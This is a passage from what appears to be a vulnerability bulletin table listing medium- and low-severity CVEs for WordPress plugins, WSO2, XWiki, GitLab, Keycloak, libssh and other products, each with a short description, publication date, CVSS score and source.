wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder WP & WooCommerce Search allows Reflected XSS. This issue affects Doofinder WP & WooCommerce Search: from n/a through 2.1.7. | 2023-12-15 | 6.1 | CVE-2023-49185 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Spoonthemes Adifier - Classified Ads WordPress Theme allows Reflected XSS. This issue affects Adifier - Classified Ads WordPress Theme: from n/a before 3.1.4. | 2023-12-15 | 6.1 | CVE-2023-49187 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in smp7, wp.Insider Simple Membership allows Reflected XSS. This issue affects Simple Membership: from n/a through 4.3.8. | 2023-12-19 | 6.1 | CVE-2023-50376 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Currency.Wiki Currency Converter Widget - Exchange Rates allows Stored XSS. This issue affects Currency Converter Widget - Exchange Rates: from n/a through 3.0.2. | 2023-12-21 | 6.5 | CVE-2023-50822 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wipeout Media CSS & JavaScript Toolbox allows Stored XSS. This issue affects CSS & JavaScript Toolbox: from n/a through 11.7. | 2023-12-21 | 6.5 | CVE-2023-50823 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS. This issue affects Insert or Embed Articulate Content into WordPress: from n/a through 4.3000000021. | 2023-12-21 | 6.5 | CVE-2023-50824 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Terrier Tenacity iframe Shortcode allows Stored XSS. This issue affects iframe Shortcode: from n/a through 2.0. | 2023-12-21 | 6.5 | CVE-2023-50825 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in VillaTheme CURCY - Multi Currency for WooCommerce allows Stored XSS. This issue affects CURCY - Multi Currency for WooCommerce: from n/a through 2.2.0. | 2023-12-21 | 6.5 | CVE-2023-50831 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ExtendThemes Colibri Page Builder allows Stored XSS. This issue affects Colibri Page Builder: from n/a through 1.0.239. | 2023-12-21 | 6.5 | CVE-2023-50833 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in August Infotech WooCommerce Menu Extension allows Stored XSS. This issue affects WooCommerce Menu Extension: from n/a through 1.6.2. | 2023-12-21 | 6.5 | CVE-2023-50834 audit@patchstack.com |
wordpress -- wordpress | The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. | 2023-12-18 | 6.1 | CVE-2023-5348 contact@wpscan.com |
wordpress -- wordpress | The Slider WordPress plugin before 3.5.12 does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected | 2023-12-18 | 6.5 | CVE-2023-6077 contact@wpscan.com |
wordpress -- wordpress | The Divi theme for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'et_pb_text' shortcode in all versions up to, and including, 4.23.1 due to insufficient input sanitization and output escaping on user supplied custom field data. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-23 | 6.4 | CVE-2023-6744 security@wordfence.com security@wordfence.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Popup Maker Popup Maker - Popup for opt-ins, lead gen, & more. This issue affects Popup Maker - Popup for opt-ins, lead gen, & more: from n/a through 1.17.1. | 2023-12-20 | 5.3 | CVE-2022-47597 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in File Manager by Bit Form Team File Manager - 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager. This issue affects File Manager - 100% Free & Open Source File Manager Plugin for WordPress | Bit File Manager: from n/a through 5.2.7. | 2023-12-20 | 5.5 | CVE-2022-47599 audit@patchstack.com |
wordpress -- wordpress | Missing Authorization, Cross-Site Request Forgery (CSRF) vulnerability in Hal Gatewood Dashicons + Custom Post Types. This issue affects Dashicons + Custom Post Types: from n/a through 1.0.2. | 2023-12-21 | 5.4 | CVE-2023-22674 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Smackcoders Export All Posts, Products, Orders, Refunds & Users. This issue affects Export All Posts, Products, Orders, Refunds & Users: from n/a through 2.4.1. | 2023-12-21 | 5.9 | CVE-2023-2487 audit@patchstack.com |
wordpress -- wordpress | Missing Authorization vulnerability in GamiPress GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress. This issue affects GamiPress - The #1 gamification plugin to reward points, achievements, badges & ranks in WordPress: from n/a through 2.5.6. | 2023-12-19 | 5.4 | CVE-2023-25715 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Winwar Media WordPress Email Marketing Plugin - WP Email Capture. This issue affects WordPress Email Marketing Plugin - WP Email Capture: from n/a through 3.10. | 2023-12-21 | 5.3 | CVE-2023-28421 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WooCommerce WooCommerce Bookings. This issue affects WooCommerce Bookings: from n/a through 1.15.78. | 2023-12-21 | 5.4 | CVE-2023-32747 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in MarketingFire Editorial Calendar. This issue affects Editorial Calendar: from n/a through 3.7.12. | 2023-12-20 | 5.4 | CVE-2023-36520 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Jordy Meow Photo Engine (Media Organizer & Lightroom). This issue affects Photo Engine (Media Organizer & Lightroom): from n/a through 6.2.5. | 2023-12-20 | 5.4 | CVE-2023-38513 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in WP Sunshine Sunshine Photo Cart: Free Client Galleries for Photographers. This issue affects Sunshine Photo Cart: Free Client Galleries for Photographers: from n/a before 3.0.0. | 2023-12-20 | 5.3 | CVE-2023-41796 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Jordy Meow Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina). This issue affects Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina): from n/a through 6.4.5. | 2023-12-19 | 5.3 | CVE-2023-44982 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Aruba.It Aruba HiSpeed Cache. This issue affects Aruba HiSpeed Cache: from n/a through 2.0.6. | 2023-12-19 | 5.3 | CVE-2023-44983 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in A WP Life Event Monster - Event Management, Tickets Booking, Upcoming Event allows Stored XSS. This issue affects Event Monster - Event Management, Tickets Booking, Upcoming Event: from n/a through 1.3.2. | 2023-12-21 | 5.9 | CVE-2023-47525 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Sajjad Hossain Sagor WP Edit Username allows Stored XSS. This issue affects WP Edit Username: from n/a through 1.0.5. | 2023-12-21 | 5.9 | CVE-2023-47527 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Till Krüss Email Address Encoder allows Stored XSS. This issue affects Email Address Encoder: from n/a through 1.0.22. | 2023-12-15 | 5.4 | CVE-2023-48765 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Kulwant Nagi Affiliate Booster - Pros & Cons, Notice, and CTA Blocks for Affiliates. This issue affects Affiliate Booster - Pros & Cons, Notice, and CTA Blocks for Affiliates: from n/a through 3.0.5. | 2023-12-18 | 5.4 | CVE-2023-49148 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in formzu Inc. Formzu WP allows Stored XSS. This issue affects Formzu WP: from n/a through 1.6.6. | 2023-12-15 | 5.4 | CVE-2023-49160 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress. This issue affects BigCommerce For WordPress: from n/a through 5.0.6. | 2023-12-21 | 5.3 | CVE-2023-49162 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Real Big Plugins Client Dash allows Stored XSS. This issue affects Client Dash: from n/a through 2.2.1. | 2023-12-15 | 5.4 | CVE-2023-49165 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in datafeedr.Com Ads by datafeedr.Com allows Stored XSS. This issue affects Ads by datafeedr.Com: from n/a through 1.2.0. | 2023-12-15 | 5.4 | CVE-2023-49169 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in dFactory Responsive Lightbox & Gallery allows Stored XSS. This issue affects Responsive Lightbox & Gallery: from n/a through 2.4.5. | 2023-12-15 | 5.4 | CVE-2023-49174 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kreativo Pro KP Fastest Tawk.To Chat allows Stored XSS. This issue affects KP Fastest Tawk.To Chat: from n/a through 1.1.1. | 2023-12-15 | 5.4 | CVE-2023-49175 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in N.O.U.S. Open Useful and Simple Event post allows Stored XSS. This issue affects Event post: from n/a through 5.8.6. | 2023-12-15 | 5.4 | CVE-2023-49179 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WP Event Manager WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce allows Stored XSS. This issue affects WP Event Manager - Events Calendar, Registrations, Sell Tickets with WooCommerce: from n/a through 3.1.40. | 2023-12-15 | 5.4 | CVE-2023-49181 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPDeveloper Parallax Slider Block allows Stored XSS. This issue affects Parallax Slider Block: from n/a through 1.2.4. | 2023-12-15 | 5.4 | CVE-2023-49184 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WebFactory Ltd Guest Author allows Stored XSS. This issue affects Guest Author: from n/a through 2.3. | 2023-12-15 | 5.4 | CVE-2023-49747 audit@patchstack.com |
wordpress -- wordpress | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in AppMySite AppMySite - Create an app with the Best Mobile App Builder. This issue affects AppMySite - Create an app with the Best Mobile App Builder: from n/a through 3.11.0. | 2023-12-21 | 5.3 | CVE-2023-49762 audit@patchstack.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in J.N. Breetvelt a.K.A. OpaJaap WP Photo Album Plus. This issue affects WP Photo Album Plus: from n/a through 8.5.02.005. | 2023-12-19 | 5.3 | CVE-2023-49812 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in LiveChat LiveChat - WP live chat plugin for WordPress. This issue affects LiveChat - WP live chat plugin for WordPress: from n/a through 4.5.15. | 2023-12-18 | 5.4 | CVE-2023-49821 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BoldThemes Bold Page Builder allows Stored XSS. This issue affects Bold Page Builder: from n/a through 4.6.1. | 2023-12-15 | 5.4 | CVE-2023-49823 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AB-WP Simple Counter allows Stored XSS. This issue affects Simple Counter: from n/a through 1.0.2. | 2023-12-21 | 5.9 | CVE-2023-50377 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Freshlight Lab Menu Image, Icons made easy allows Stored XSS. This issue affects Menu Image, Icons made easy: from n/a through 3.10. | 2023-12-21 | 5.9 | CVE-2023-50826 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Accredible Accredible Certificates & Open Badges allows Stored XSS. This issue affects Accredible Certificates & Open Badges: from n/a through 1.4.8. | 2023-12-21 | 5.9 | CVE-2023-50827 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in David Vongries Ultimate Dashboard - Custom WordPress Dashboard allows Stored XSS. This issue affects Ultimate Dashboard - Custom WordPress Dashboard: from n/a through 3.7.11. | 2023-12-21 | 5.9 | CVE-2023-50828 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aerin Loan Repayment Calculator and Application Form allows Stored XSS. This issue affects Loan Repayment Calculator and Application Form: from n/a through 2.9.3. | 2023-12-21 | 5.9 | CVE-2023-50829 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Seosbg Seos Contact Form allows Stored XSS. This issue affects Seos Contact Form: from n/a through 1.8.0. | 2023-12-21 | 5.9 | CVE-2023-50830 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Mondula GmbH Multi Step Form allows Stored XSS. This issue affects Multi Step Form: from n/a through 1.7.13. | 2023-12-21 | 5.9 | CVE-2023-50832 audit@patchstack.com |
wordpress -- wordpress | Cross-Site Request Forgery (CSRF) vulnerability in Praveen Goswami Advanced Category Template. This issue affects Advanced Category Template: from n/a through 0.1. | 2023-12-19 | 5.4 | CVE-2023-50835 audit@patchstack.com |
wordpress -- wordpress | The Image horizontal reel scroll slideshow plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'ihrss-gallery' shortcode in versions up to, and including, 13.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-5413 security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | The Jquery news ticker plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'jquery-news-ticker' shortcode in versions up to, and including, 3.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-5432 security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code | 2023-12-18 | 5.3 | CVE-2023-6065 contact@wpscan.com contact@wpscan.com |
wordpress -- wordpress | The WP Shortcodes Plugin - Shortcodes Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'su_button', 'su_members', and 'su_tabs' shortcodes in all versions up to, and including, 7.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2023-12-19 | 5.4 | CVE-2023-6488 security@wordfence.com security@wordfence.com security@wordfence.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in XWP Stream. This issue affects Stream: from n/a through 3.9.2. | 2023-12-19 | 4.3 | CVE-2022-43450 audit@patchstack.com |
wordpress -- wordpress | Deserialization of Untrusted Data vulnerability in weDevs Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy. This issue affects Dokan - Best WooCommerce Multivendor Marketplace Solution - Build Your Own Amazon, eBay, Etsy: from n/a through 3.7.19. | 2023-12-19 | 4.4 | CVE-2023-34382 audit@patchstack.com |
wordpress -- wordpress | URL Redirection to Untrusted Site ('Open Redirect') vulnerability in Parcel Pro. This issue affects Parcel Pro: from n/a through 1.6.11. | 2023-12-19 | 4.7 | CVE-2023-46624 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Ternstyle LLC Automatic Youtube Video Posts Plugin allows Stored XSS. This issue affects Automatic Youtube Video Posts Plugin: from n/a through 5.2.2. | 2023-12-15 | 4.8 | CVE-2023-49180 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ZealousWeb Track Geolocation Of Users Using Contact Form 7 allows Stored XSS. This issue affects Track Geolocation Of Users Using Contact Form 7: from n/a through 1.4. | 2023-12-15 | 4.8 | CVE-2023-49188 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Getsocial, S.A. Social Share Buttons & Analytics Plugin - GetSocial.Io allows Stored XSS. This issue affects Social Share Buttons & Analytics Plugin - GetSocial.Io: from n/a through 4.3.12. | 2023-12-15 | 4.8 | CVE-2023-49189 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Chandra Shekhar Sahu Site Offline Or Coming Soon Or Maintenance Mode allows Stored XSS. This issue affects Site Offline Or Coming Soon Or Maintenance Mode: from n/a through 1.5.6. | 2023-12-15 | 4.8 | CVE-2023-49190 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Supsystic GDPR Cookie Consent by Supsystic allows Stored XSS. This issue affects GDPR Cookie Consent by Supsystic: from n/a through 2.1.2. | 2023-12-15 | 4.8 | CVE-2023-49191 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Biteship Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo allows Stored XSS. This issue affects Biteship: Plugin Ongkos Kirim Kurir Instant, Reguler, Kargo: from n/a through 2.2.24. | 2023-12-15 | 4.8 | CVE-2023-49767 audit@patchstack.com |
wordpress -- wordpress | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeum Tutor LMS - eLearning and online course solution allows Stored XSS. This issue affects Tutor LMS - eLearning and online course solution: from n/a through 2.2.4. | 2023-12-15 | 4.8 | CVE-2023-49829 audit@patchstack.com |
wordpress -- wordpress | The Autocomplete Location field Contact Form 7 WordPress plugin before 3.0, autocomplete-location-field-contact-form-7-pro WordPress plugin before 2.0 does not sanitize and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) | 2023-12-18 | 4.8 | CVE-2023-5005 contact@wpscan.com |
wordpress -- wordpress | The Swift Performance Lite WordPress plugin before 2.3.6.15 does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. | 2023-12-18 | 4.3 | CVE-2023-6289 contact@wpscan.com |
wordpress -- wordpress | Authorization Bypass Through User-Controlled Key vulnerability in Blaz K. Rate my Post - WP Rating System. This issue affects Rate my Post - WP Rating System: from n/a through 3.4.1. | 2023-12-21 | 4.3 | CVE-2023-49765 audit@patchstack.com |
wso2 -- api_manager | Due to improper error handling, a REST API resource could expose a server side error containing an internal WSO2 specific package name in the HTTP response. | 2023-12-15 | 5.3 | CVE-2023-6839 ed10eef1-636d-4fbe-9993-6890dfa878f8 |
wso2 -- api_manager/iot_server | Multiple WSO2 products have been identified as vulnerable due to lack of server-side input validation in the Forum feature, API rating could be manipulated. | 2023-12-15 | 4.3 | CVE-2023-6835 ed10eef1-636d-4fbe-9993-6890dfa878f8 |
wso2 -- multiple_products | Reflected XSS vulnerability can be exploited by tampering a request parameter in Authentication Endpoint. This can be performed in both authenticated and unauthenticated requests. | 2023-12-15 | 6.1 | CVE-2023-6838 ed10eef1-636d-4fbe-9993-6890dfa878f8 |
wso2 -- multiple_products | Multiple WSO2 products have been identified as vulnerable due to improper output encoding, a Stored Cross Site Scripting (XSS) attack can be carried out by an attacker injecting a malicious payload into the Registry feature of the Management Console. | 2023-12-18 | 4.8 | CVE-2023-6911 ed10eef1-636d-4fbe-9993-6890dfa878f8 |
xwiki -- xwiki | XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability. | 2023-12-15 | 5.3 | CVE-2023-50720 security-advisories@github.com security-advisories@github.com security-advisories@github.com |
yiisoft -- yii2-authclient | yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth1/2 `state` and OpenID Connect `nonce` is vulnerable for a `timing attack` since it is compared via regular string comparison (instead of `Yii::$app->getSecurity()->compareString()`). Version 2.2.15 contains a patch for the issue. No known workarounds are available. | 2023-12-22 | 6.1 | CVE-2023-50708 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
yiisoft -- yii2-authclient | yii2-authclient is an extension that adds OpenID, OAuth, OAuth2 and OpenId Connect consumers for the Yii framework 2.0. In yii2-authclient prior to version 2.2.15, the Oauth2 PKCE implementation is vulnerable in 2 ways. First, the `authCodeVerifier` should be removed after usage (similar to `authState`). Second, there is a risk for a `downgrade attack` if PKCE is being relied on for CSRF protection. Version 2.2.15 contains a patch for the issue. No known workarounds are available. | 2023-12-22 | 6.8 | CVE-2023-50714 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
Low Vulnerabilities
Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info |
---|---|---|---|---|
adobe -- experience_manager | Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction. | 2023-12-15 | 3.5 | CVE-2023-48608 psirt@adobe.com |
automad -- automad | A vulnerability was found in automad up to 1.10.9 and classified as problematic. Affected by this issue is some unknown functionality of the file packages\standard\templates\post.php of the component Setting Handler. The manipulation of the argument sitename leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248684. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2023-12-21 | 2.4 | CVE-2023-7035 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
code-projects -- faculty_management_system | A vulnerability, which was classified as problematic, has been found in code-projects Faculty Management System 1.0. Affected by this issue is some unknown functionality of the file /admin/pages/yearlevel.php. The manipulation of the argument Year Level/Section leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248744. | 2023-12-22 | 3.5 | CVE-2023-7057 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
code-projects -- faculty_management_system | A vulnerability classified as problematic was found in code-projects Faculty Management System 1.0. Affected by this vulnerability is an unknown functionality of the file /admin/pages/subjects.php. The manipulation of the argument Description/Units leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-248743. | 2023-12-22 | 2.4 | CVE-2023-7056 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
code-projects -- point_of_sales_and_inventory_management_system | A vulnerability was found in code-projects Point of Sales and Inventory Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /main/checkout.php. The manipulation of the argument pt leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-248846 is the identifier assigned to this vulnerability. | 2023-12-22 | 3.5 | CVE-2023-7075 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
enterprise_server -- enterprise_server | A race condition in GitHub Enterprise Server allowed an existing admin to maintain permissions on transferred repositories by making a GraphQL mutation to alter repository permissions during the transfer. This vulnerability affected GitHub Enterprise Server version 3.8.0 and above and was fixed in version 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 3.9 | CVE-2023-6690 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
enterprise_server -- enterprise_server | An incorrect authorization vulnerability was identified in GitHub Enterprise Server that allowed issue comments to be read with an improperly scoped token. This vulnerability affected all versions of GitHub Enterprise Server since 3.7 and was fixed in version 3.17.19, 3.8.12, 3.9.7, 3.10.4, and 3.11.1. | 2023-12-21 | 2.7 | CVE-2023-51380 product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com product-cna@github.com |
gallagher -- controller_6000 | Sensitive information uncleared after debug/power state transition in the Controller 6000 could be abused by an attacker with knowledge of the Controller's default diagnostic password and physical access to the Controller to view its configuration through the diagnostic web pages. This issue affects: Gallagher Controller 6000 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), v8.60 or earlier. | 2023-12-18 | 2.4 | CVE-2023-41967 disclosures@gallagher.com |
gallagher -- multiple_products | Improper input validation of a large HTTP request in the Controller 6000 and Controller 7000 optional diagnostic web interface (Port 80) can be used to perform a Denial of Service of the diagnostic web interface. This issue affects: Gallagher Controller 6000 and 7000 8.90 prior to vCR8.90.231204a (distributed in 8.90.1620 (MR2)), 8.80 prior to vCR8.80.231204a (distributed in 8.80.1369 (MR3)), 8.70 prior to vCR8.70.231204a (distributed in 8.70.2375 (MR5)), 8.60 prior to vCR8.60.231116a (distributed in 8.60.2550 (MR7)), all versions of 8.50 and prior. | 2023-12-18 | 3.1 | CVE-2023-22439 disclosures@gallagher.com |
gitlab -- gitlab | An issue has been discovered in GitLab EE affecting all versions starting from 8.17 before 16.4.4, all versions starting from 16.5 before 16.5.4, all versions starting from 16.6 before 16.6.2. It was possible for auditor users to fork and submit merge requests to private projects they're not a member of. | 2023-12-15 | 3.5 | CVE-2023-3511 cve@gitlab.com cve@gitlab.com |
keycloak -- keycloak | Keycloak's device authorization grant does not correctly validate the device code and client ID. An attacker client could abuse the missing validation to spoof a client consent request and trick an authorization admin into granting consent to a malicious OAuth client or possible unauthorized access to an existing OAuth client. | 2023-12-21 | 3.5 | CVE-2023-2585 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
libssh -- libssh | A flaw was found in the libssh implements abstract layer for message digest (MD) operations implemented by different supported crypto backends. The return values from these were not properly checked, which could cause low-memory situations failures, NULL dereferences, crashes, or usage of the uninitialized memory as an input for the KDF. In this case, non-matching keys will result in decryption/integrity failures, terminating the connection. | 2023-12-19 | 3.7 | CVE-2023-6918 secalert@redhat.com secalert@redhat.com secalert@redhat.com secalert@redhat.com |
nautobot -- nautobot | Nautobot is a Network Source of Truth and Network Automation Platform built as a web application atop the Django Python framework with a PostgreSQL or MySQL database. When submitting a Job to run via a Job Button, only the model-level `extras.run_job` permission is checked (i.e., does the user have permission to run Jobs in general). Object-level permissions (i.e., does the user have permission to run this specific Job?) are not enforced by the URL/view used in this case. A user with permissions to run even a single Job can actually run all configured JobButton Jobs. Fix will be available in Nautobot 1.6.8 and 2.1.0 | 2023-12-22 | 3.5 | CVE-2023-51649 security-advisories@github.com security-advisories@github.com security-advisories@github.com security-advisories@github.com |
nextcloud -- security-advisories | Nextcloud/Cloud is a calendar app for Nextcloud. An attacker can gain access to stacktrace and internal paths of the server when generating an exception while editing a calendar appointment. It is recommended that the Nextcloud Calendar app is upgraded to 4.5.3 | 2023-12-22 | 3.5 | CVE-2023-48308 security-advisories@github.com security-advisories@github.com |
phpgurukul -- online_notes_sharing_system | A vulnerability has been found in PHPGurukul Online Notes Sharing System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file user/profile.php. The manipulation of the argument name/email leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-248737 was assigned to this vulnerability. | 2023-12-21 | 3.5 | CVE-2023-7050 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
phpgurukul -- online_notes_sharing_system | A vulnerability was found in PHPGurukul Online Notes Sharing System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the file /user/signup.php. The manipulation leads to weak password requirements. The attack can be initiated remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-248740. | 2023-12-22 | 3.1 | CVE-2023-7053 cna@vuldb.com cna@vuldb.com cna@vuldb.com |
